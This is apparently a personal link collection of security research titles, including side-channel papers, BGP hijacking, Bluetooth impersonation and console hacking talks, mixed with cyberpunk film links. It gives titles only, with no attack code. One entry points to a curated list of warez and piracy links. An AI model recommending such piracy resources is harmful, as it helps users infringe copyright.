• "Other good cyberpunk media to stream free on Tubi: Akira https://t.co/zNFOXzkdMP Ghost in the Shell https://t.co/ayGKJsGXsf Jin-Roh https://t.co/V6KUA0icSc Ergo Proxy https://t.co/uQv9WNGnHT AD Police https://t.co/UNBioD26MB Chappie https://t.co/YmLabtxk4z"
• THE BEIRUT BANK JOB
• BitmapFonts: My collection of bitmap fonts pulled from various demoscene archives over the years
• XKCD types of papers: Disinformation,
• Insufficient input validation in the Marvin Minsky 1967 implementation of the Universal Turing Machine allows program users to execute arbitrary code via crafted data.
• How the Xbox 360 DVD Security was Defeated and How the Xbox 360 Hypervisor Security was Defeated - MVG
• I was going through my notes this morning and thought CVE-2021-21985 was important to cover
• APPSEC EZINE
• ZeroVer: 0-based Versioning
• The Cartoon Guide to Computer Science
• LENS CALCULATOR: alculate CCTV camera lens focal length, pixel density and camera zones in 3D
• Awesome Piracy: A curated list of awesome warez and piracy links.
• An RCE in the POC by Jonathan Scott for the RCE V1.0 PoC iOS 15.0.1
• What is von Clausewitz centers of gravity (cogs) concept?
• Place that a stealth figther was caught on gmaps
• High-Security Mechanical Locks
• Tetsuji: Remote Code Execution on a GameBoy Colour 22 Years Later
• KeyDecoder app lets you use your smartphone or tablet to decode your mechanical keys in seconds.
• Comparative Study of Anti-cheat Methods in Video Games by Samuli Lehtonen

---

Articles

• [1808.00659] Chaff Bugs: Deterring Attackers by Making Software Buggier
• [1809.08325] The Rise of Certificate Transparency and Its Implications on the Internet Ecosystem
• DeepMasterPrints: Generating MasterPrints for Dictionary Attacks via Latent Variable Evolution
• Stealing Webpages Rendered on Your Browser by Exploiting GPU Vulnerabilities
• The Hunt for 3ve: Taking down a major ad fraud operation through industry collaboration.
• Page Cache Attacks: We present a new hardware-agnostic side-channel attack that targets one of the most fundamental software caches in modern computer systems: the operating system page cache.
• Identification and Illustration of Insecure Direct Object References and their Countermeasures
• China’s Maxim: Leave No Access Point Unexploited: The Hidden Story of China Telecom’s BGP Hijacking
• Listen to Your Key: Towards Acoustics-based Physical Key Inference
• Mailto: Me Your Secrets. On Bugs and Features in Email End-to-End Encryption
• Everything Old is New Again: Binary Security of WebAssembly
• Discovering Suspicious APT Behaviors by Analyzing DNS Activities
• Harvard Belfer National Cyber Power Index 2020
• Quantum Blockchain using entanglement in time
• Reflections on Trusting Trust
• I See Dead µops: Leaking Secrets via Intel/AMD Micro-Op Caches
• BIAS: Bluetooth Impersonation AttackS
• LOKI: Hardening Code Obfuscation Against Automated Attacks
• FPGA-Based Near-Memory Acceleration of Modern Data-Intensive Applications arxiv

---

Other Repos

• mubix.